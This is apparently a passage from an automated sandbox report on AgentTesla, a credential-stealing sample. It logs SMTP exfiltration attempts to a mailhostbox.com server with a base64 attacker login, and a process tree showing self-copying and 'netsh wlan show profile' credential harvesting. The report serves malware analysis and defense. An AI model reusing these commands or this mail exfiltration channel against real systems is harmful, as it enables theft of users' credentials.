                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Jan 14, 2021 03:38:50.115310907 CET49769587192.168.2.4208.91.198.143AUTH login bndhbWFAYnVsa2xvZ3MudG9w
                                                                                          Jan 14, 2021 03:38:50.291225910 CET58749769208.91.198.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:38:52.550067902 CET58749769208.91.198.143192.168.2.4535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:38:52.553708076 CET49769587192.168.2.4208.91.198.143MAIL FROM:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:38:52.729701042 CET58749769208.91.198.143192.168.2.4250 2.1.0 Ok
                                                                                          Jan 14, 2021 03:38:52.730365992 CET49769587192.168.2.4208.91.198.143RCPT TO:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:38:52.910880089 CET58749769208.91.198.143192.168.2.4554 5.7.1 <nwama@bulklogs.top>: Relay access denied
                                                                                          Jan 14, 2021 03:38:53.492810011 CET58749770208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                          Jan 14, 2021 03:38:53.493453026 CET49770587192.168.2.4208.91.198.143EHLO 445817
                                                                                          Jan 14, 2021 03:38:53.668452024 CET58749770208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Jan 14, 2021 03:38:53.668843031 CET49770587192.168.2.4208.91.198.143AUTH login bndhbWFAYnVsa2xvZ3MudG9w
                                                                                          Jan 14, 2021 03:38:53.844468117 CET58749770208.91.198.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:38:55.350706100 CET58749770208.91.198.143192.168.2.4535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:38:55.351398945 CET49770587192.168.2.4208.91.198.143MAIL FROM:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:38:55.527075052 CET58749770208.91.198.143192.168.2.4250 2.1.0 Ok
                                                                                          Jan 14, 2021 03:38:55.529506922 CET49770587192.168.2.4208.91.198.143RCPT TO:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:38:55.709355116 CET58749770208.91.198.143192.168.2.4554 5.7.1 <nwama@bulklogs.top>: Relay access denied
                                                                                          Jan 14, 2021 03:40:19.719785929 CET58749773208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                          Jan 14, 2021 03:40:19.720010042 CET49773587192.168.2.4208.91.198.143EHLO 445817
                                                                                          Jan 14, 2021 03:40:19.720334053 CET58749772208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                          Jan 14, 2021 03:40:19.720499039 CET49772587192.168.2.4208.91.198.143EHLO 445817
                                                                                          Jan 14, 2021 03:40:19.748115063 CET58749774208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                          Jan 14, 2021 03:40:19.748383045 CET49774587192.168.2.4208.91.198.143EHLO 445817
                                                                                          Jan 14, 2021 03:40:19.892843008 CET58749773208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Jan 14, 2021 03:40:19.893080950 CET49773587192.168.2.4208.91.198.143AUTH login bndhbWFAYnVsa2xvZ3MudG9w
                                                                                          Jan 14, 2021 03:40:19.894793987 CET58749772208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Jan 14, 2021 03:40:19.894994974 CET49772587192.168.2.4208.91.198.143AUTH login bndhbWFAYnVsa2xvZ3MudG9w
                                                                                          Jan 14, 2021 03:40:19.922291040 CET58749774208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Jan 14, 2021 03:40:19.922487020 CET49774587192.168.2.4208.91.198.143AUTH login bndhbWFAYnVsa2xvZ3MudG9w
                                                                                          Jan 14, 2021 03:40:20.066808939 CET58749773208.91.198.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:40:20.070353985 CET58749772208.91.198.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:40:20.097296000 CET58749774208.91.198.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:40:22.473912954 CET58749773208.91.198.143192.168.2.4535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:40:22.474267006 CET58749772208.91.198.143192.168.2.4535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:40:22.524705887 CET58749774208.91.198.143192.168.2.4535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:40:22.652414083 CET49772587192.168.2.4208.91.198.143MAIL FROM:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:40:22.652452946 CET49774587192.168.2.4208.91.198.143MAIL FROM:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:40:22.652458906 CET49773587192.168.2.4208.91.198.143MAIL FROM:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:40:22.826167107 CET58749773208.91.198.143192.168.2.4250 2.1.0 Ok
                                                                                          Jan 14, 2021 03:40:22.827114105 CET58749774208.91.198.143192.168.2.4250 2.1.0 Ok
                                                                                          Jan 14, 2021 03:40:22.827848911 CET58749772208.91.198.143192.168.2.4250 2.1.0 Ok
                                                                                          Jan 14, 2021 03:40:22.828411102 CET49773587192.168.2.4208.91.198.143RCPT TO:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:40:22.828443050 CET49774587192.168.2.4208.91.198.143RCPT TO:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:40:22.828445911 CET49772587192.168.2.4208.91.198.143RCPT TO:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:40:23.006000042 CET58749773208.91.198.143192.168.2.4554 5.7.1 <nwama@bulklogs.top>: Relay access denied
                                                                                          Jan 14, 2021 03:40:23.006797075 CET58749774208.91.198.143192.168.2.4554 5.7.1 <nwama@bulklogs.top>: Relay access denied
                                                                                          Jan 14, 2021 03:40:23.007632017 CET58749772208.91.198.143192.168.2.4554 5.7.1 <nwama@bulklogs.top>: Relay access denied

                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          Analysis Process: sample2.exe PID: 7104 Parent PID: 6032

                                                                                          General

                                                                                          Start time:03:37:36
                                                                                          Start date:14/01/2021
                                                                                          Path:C:\Users\user\Desktop\sample2.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\Desktop\sample2.exe'
                                                                                          Imagebase:0x590000
                                                                                          File size:608768 bytes
                                                                                          MD5 hash:B0F2D519CCAE5BF1435264E0979770CE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.661861944.0000000003D5A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          Analysis Process: sample2.exe PID: 5652 Parent PID: 7104

                                                                                          General

                                                                                          Start time:03:37:43
                                                                                          Start date:14/01/2021
                                                                                          Path:C:\Users\user\Desktop\sample2.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:{path}
                                                                                          Imagebase:0xee0000
                                                                                          File size:608768 bytes
                                                                                          MD5 hash:B0F2D519CCAE5BF1435264E0979770CE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.987520387.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.996293991.0000000003865000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.992160350.0000000003704000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          Analysis Process: nwama.exe PID: 6508 Parent PID: 3424

                                                                                          General

                                                                                          Start time:03:38:07
                                                                                          Start date:14/01/2021
                                                                                          Path:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\nwama\nwama.exe'
                                                                                          Imagebase:0x7c0000
                                                                                          File size:608768 bytes
                                                                                          MD5 hash:B0F2D519CCAE5BF1435264E0979770CE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.721770177.0000000003F4A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 30%, Metadefender, Browse
                                                                                          • Detection: 81%, ReversingLabs
                                                                                          Reputation:low

                                                                                          Analysis Process: nwama.exe PID: 7068 Parent PID: 6508

                                                                                          General

                                                                                          Start time:03:38:09
                                                                                          Start date:14/01/2021
                                                                                          Path:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:{path}
                                                                                          Imagebase:0xae0000
                                                                                          File size:608768 bytes
                                                                                          MD5 hash:B0F2D519CCAE5BF1435264E0979770CE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.996705258.0000000003454000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.987543673.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.993193122.00000000032F8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          Analysis Process: nwama.exe PID: 5848 Parent PID: 3424

                                                                                          General

                                                                                          Start time:03:38:15
                                                                                          Start date:14/01/2021
                                                                                          Path:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\nwama\nwama.exe'
                                                                                          Imagebase:0x8d0000
                                                                                          File size:608768 bytes
                                                                                          MD5 hash:B0F2D519CCAE5BF1435264E0979770CE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.737377613.000000000416B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          Analysis Process: netsh.exe PID: 2208 Parent PID: 5652

                                                                                          General

                                                                                          Start time:03:38:16
                                                                                          Start date:14/01/2021
                                                                                          Path:C:\Windows\SysWOW64\netsh.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'netsh' wlan show profile
                                                                                          Imagebase:0x9f0000
                                                                                          File size:82944 bytes
                                                                                          MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Analysis Process: conhost.exe PID: 4612 Parent PID: 2208

                                                                                          General

                                                                                          Start time:03:38:16
                                                                                          Start date:14/01/2021
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff724c50000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Analysis Process: nwama.exe PID: 6592 Parent PID: 5848

                                                                                          General

                                                                                          Start time:03:38:18
                                                                                          Start date:14/01/2021
                                                                                          Path:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:{path}
                                                                                          Imagebase:0x520000
                                                                                          File size:608768 bytes
                                                                                          MD5 hash:B0F2D519CCAE5BF1435264E0979770CE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.991842162.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.991287271.0000000002C14000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.987505021.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          Analysis Process: netsh.exe PID: 5780 Parent PID: 7068

                                                                                          General

                                                                                          Start time:03:38:40
                                                                                          Start date:14/01/2021
                                                                                          Path:C:\Windows\SysWOW64\netsh.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'netsh' wlan show profile
                                                                                          Imagebase:0x9f0000
                                                                                          File size:82944 bytes
                                                                                          MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Analysis Process: conhost.exe PID: 900 Parent PID: 5780

                                                                                          General

                                                                                          Start time:03:38:40
                                                                                          Start date:14/01/2021
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff724c50000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Analysis Process: netsh.exe PID: 5480 Parent PID: 6592

                                                                                          General

                                                                                          Start time:03:38:47
                                                                                          Start date:14/01/2021
                                                                                          Path:C:\Windows\SysWOW64\netsh.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'netsh' wlan show profile
                                                                                          Imagebase:0x9f0000
                                                                                          File size:82944 bytes
                                                                                          MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Analysis Process: conhost.exe PID: 5484 Parent PID: 5480

                                                                                          General

                                                                                          Start time:03:38:47
                                                                                          Start date:14/01/2021
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff724c50000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Disassembly

                                                                                          Code Analysis

                                                                                          Reset < >